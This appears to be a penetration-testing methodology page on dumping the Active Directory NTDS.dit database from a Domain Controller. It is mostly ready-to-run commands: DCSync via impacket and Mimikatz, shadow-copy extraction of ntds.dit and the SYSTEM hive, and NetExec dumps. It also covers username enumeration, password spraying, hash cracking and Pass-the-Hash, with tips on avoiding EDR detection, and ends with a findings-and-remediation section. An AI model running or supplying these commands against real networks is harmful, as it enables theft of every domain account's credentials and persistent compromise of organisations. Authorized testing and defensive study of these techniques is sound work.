π‘οΈ Methodology Checklist
- Requires Domain Admin or equivalent on DC
- DCSync (preferred, no files):
impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm - Mimikatz DCSync:
lsadump::dcsync /user:krbtgt/lsadump::dcsync /all /csv - Volume Shadow Copy method:
vssadmin create shadow /for=C:; copy NTDS.dit + SYSTEM hive - NXC NTDS dump:
nxc smb [DC_IP] -u [USER] -p [PASS] --ntds - Parse offline:
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL - Prioritise DA/EA/krbtgt hashes for Golden Ticket
π― Operational Context
Use when: Domain Controller access achieved β dump NTDS.dit for all domain account NTLM hashes including krbtgt and Domain Admin.
Think Dumber First: nxc smb [DC] -u [DA_USER] -p [DA_PASS] --ntds β single command, dumps entire NTDS without touching NTDS.dit directly. Alternative: VSS shadow copy β offline NTDS.dit extraction.
Skip when: No DA-level access β NTDS requires DC admin privileges; pivot to DCSYNC instead if replication rights obtained.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
./username-anarchy -i names.txt | Generate username candidates from real names |
impacket-GetNPUsers -dc-ip [DC_IP] [DOMAIN]/ -usersfile names.txt -format hashcat | Validate usernames via Kerberos AS-REP (no lockout) |
netexec smb [DC_IP] -u users.txt -p '[PASS]' | Spray password against DC |
evil-winrm -i [DC_IP] -u [USER] -p [PASS] | Connect to DC via WinRM |
vssadmin CREATE SHADOW /For=C: | Create VSS shadow copy of C: (bypasses file lock) |
cmd /c "mklink /d c:\shadow \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\" | Map shadow copy to normal path |
cmd /c copy c:\shadow\Windows\NTDS\ntds.dit C:\NTDS\ntds.dit | Copy NTDS.dit from shadow |
reg save HKLM\SYSTEM C:\NTDS\SYSTEM | Save SYSTEM hive (required for decryption) |
cmd /c rmdir c:\shadow | Cleanup shadow symlink |
netexec smb [DC_IP] -u [USER] -p [PASS] -M ntdsutil | Automated NTDS dump via NetExec ntdsutil module |
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL | Extract all domain hashes from downloaded files |
hashcat -m 1000 [HASH_FILE] rockyou.txt | Crack NT hashes (mode 1000) |
evil-winrm -i [DC_IP] -u [USER] -H [NT_HASH] | Pass-the-Hash access after dump |
π¬ Deep Dive & Workflow
NTDS.dit Overview
The NTDS.dit (Directory Information Tree) is the Active Directory database stored on every Domain Controller at C:\Windows\NTDS\ntds.dit. It contains all domain account hashes, group memberships, GPOs, and schema. Encrypted with the BootKey from HKLM\SYSTEM β both files required to extract hashes.
Requirements: Domain Admin or Local Admin on the DC.
Phase 1 β User Enumeration Without Lockout
Before spraying, validate usernames via Kerberos AS-REP:
KDC_ERR_PREAUTH_REQUIREDβ user existsKDC_ERR_C_PRINCIPAL_UNKNOWNβ user does not exist
impacket-GetNPUsers -dc-ip [DC_IP] [DOMAIN]/ -usersfile names.txt -format hashcatUsername naming conventions to generate: jdoe, janedoe, j.doe (check LinkedIn/About pages).
Phase 2 β VSS Shadow Copy Technique (Manual / AV-Evasive)
NTDS.dit is locked by the OS while running. VSS creates an unlocked snapshot:
vssadmin CREATE SHADOW /For=C:
# Note shadow copy name from output: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
# Map to usable path (\\?\ syntax breaks WinRM)
cmd /c "mklink /d c:\shadow \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\"
mkdir C:\NTDS
cmd /c copy c:\shadow\Windows\NTDS\ntds.dit C:\NTDS\ntds.dit
reg save HKLM\SYSTEM C:\NTDS\SYSTEM
# Cleanup
cmd /c rmdir c:\shadowDownload from Evil-WinRM: download C:\NTDS\ntds.dit and download C:\NTDS\SYSTEM.
Phase 3 β Automated via NetExec
Faster but noisier β invokes ntdsutil internally:
netexec smb [DC_IP] -u [USER] -p [PASS] -M ntdsutilPhase 4 β Offline Hash Extraction
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
# Output: User:RID:LM-Hash:NT-Hash:::
# LM-Hash is usually aad3b... (disabled) β NT-Hash is the targetCrack NT hashes with mode 1000, or use directly for Pass-the-Hash.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc βntds returns permission error | Not DA or replication rights | Verify: nxc smb [DC] -u [USER] -p [PASS] shows Pwn3d!; must be DA or equivalent |
| impacket-secretsdump returns βCannot get domain infoβ | LDAP not accessible | Add DC IP explicitly: impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] |
| VSS shadow copy creation fails | VSS not running | Start: sc start vss; ensure Administrators group has VSS quota allocation |
| NTDS.dit extracted but ntdsdecrypt fails | SYSTEM hive needed too | Must have both: copy ntds.dit AND reg save HKLM\SYSTEM system.save for decryption |
| DCSync blocked by EDR | Replication traffic monitored | DCSync is detectable β MDI monitors for non-DC replication; extract directly via VSS instead |
π Reporting Trigger
Finding Title: NTDS.dit Dumped β All Domain Account Hashes Compromised Impact: Extraction of NTDS.dit provides NTLM hashes for every domain account including krbtgt, Domain Admins, and all service accounts, enabling complete and persistent domain compromise through Pass-the-Hash and Golden Ticket attacks. Root Cause: Domain Controller compromised with Domain Admin credentials. No monitoring or alerting on NTDS.dit volume access or DCSync replication requests from non-DC sources. Recommendation: Immediately change all DA account passwords. Reset krbtgt password twice (with delay). Enable Microsoft Defender for Identity to detect DCSync. Implement Privileged Access Workstations for DA usage. Enforce MFA for all privileged accounts.